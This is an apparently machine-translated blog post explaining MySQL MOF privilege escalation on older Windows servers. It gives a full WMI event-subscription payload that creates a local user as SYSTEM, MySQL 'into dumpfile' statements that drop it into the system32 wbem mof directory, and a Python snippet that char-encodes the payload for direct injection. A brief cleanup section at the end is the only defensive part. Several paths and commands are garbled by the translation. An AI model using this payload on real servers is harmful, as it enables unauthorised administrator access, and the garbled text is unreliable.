Shulou(Shulou.com)06/01 Report--

I accidentally saw this way of raising rights about mysql and studied it while I had spare time. I found that there were many places on the Internet that were not detailed enough, and the research got stuck for a period of time.

Take advantage of the premise:

The operating system is windows

Operating system version should not be too high, 2008 test failed, 2003 can (because you need to access directories in system32) or mysql startup identity has permission to access and write to c:/windows/system32/mof directories

The database is mysql and knows the mysql login account password and allows external connections (or operation in sql injection or webshell, not practiced)

First briefly introduce the principle (extracted from the Internet and personal practice)

The nullevt.mof file placed in the c:/windows/system32/mof directory is automatically executed and disappears every five seconds. If the new file is not created later, the contents of the previous nullevt.mof will be executed in a loop every five seconds, so you just need to write malicious code to the file.

The utilization code in nullevt.mof has been made public on the Internet.

# pragma namespace ("\.\ root\\ subscription") instance of _ EventFilter as $EventFilter {EventNamespace = "Root\\ Cimv2"; Name = "filtP2"; Query = "Select * From _ InstanceModificationEvent"Where TargetInstance Isa\" Win32_LocalTime\ "" And TargetInstance.Second = 5 "; QueryLanguage =" WQL ";}; instance of ActiveScriptEventConsumer as $Consumer {Name =" consPCSV2 "; ScriptingEngine =" JScript " ScriptText = "var WSH = new ActiveXObject (\" WScript.Shell\ ")\ nWSH.run (\" net.exe user xxx xxx / add\ ")";}; instance of _ FilterToConsumerBinding {Consumer = $Consumer;Filter = $EventFilter;}

The steps of the general utilization process are as follows:

Upload the file to any location on the server with any name

Through the mysql statement select load_file (the path of the uploaded file) into dumpfile'c into dumpfile'vlVERGUTING windows System32Unix mofUnix nullevt.MOF'

Then, if the upload is successful, the embedded code will be executed after a period of time.

Personally, I think it is too troublesome to upload a file. Can you select 'xxxxx' into directly? after trying, you can transcode the content and then query it. Provide part of the py code as a demonstration.

Solve the problem by using the char function in mysql

Payload = r'''#pragma namespace ("\.\\ root\\ subscription") instance of _ EventFilter as $EventFilter {EventNamespace = "Root\\ Cimv2"; Name = "filtP2"; Query = "Select * From _ InstanceModificationEvent"Where TargetInstance Isa\" Win32_LocalTime\ "" And TargetInstance.Second = 5 "; QueryLanguage =" WQL ";}; instance of ActiveScriptEventConsumer as $Consumer {Name =" consPCSV2 "; ScriptingEngine =" JScript " ScriptText = "var WSH = new ActiveXObject (\" WScript.Shell\ ")\ nWSH.run (\" net.exe user xxxx xxx / add\ ")";}; instance of _ FilterToConsumerBinding {Consumer = $Consumer; Filter = $EventFilter;} '' ascii_payload =''for each_chr in payload: ascii_payload + = str (ord (each_chr)) +', 'ascii_payload = ascii_payload [:-1] cur = conn.cursor () sql = "select char (% s) into dumpfile'cRank select char system 32 WBEMPUR Wullevt.MOF'"% ascii_payloadcur.execute (sql)

Since the mof is executed by system, the authorization process can be completed if the permissions satisfy the operations such as creating users, adding administrators, and so on.

If the server finds that mof is being used to lift the rights, how to solve the problem of looping to create users?

Open cmd and use the following command

Net stop winmgmt

Delete the contents of the folder c:/windows/system32/wbem/repository

Net start winmgmt

Can

Please correct the mistakes.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.